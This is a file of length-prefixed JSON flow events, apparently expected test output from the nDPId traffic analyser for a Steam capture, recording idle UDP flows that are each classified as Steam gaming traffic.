-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
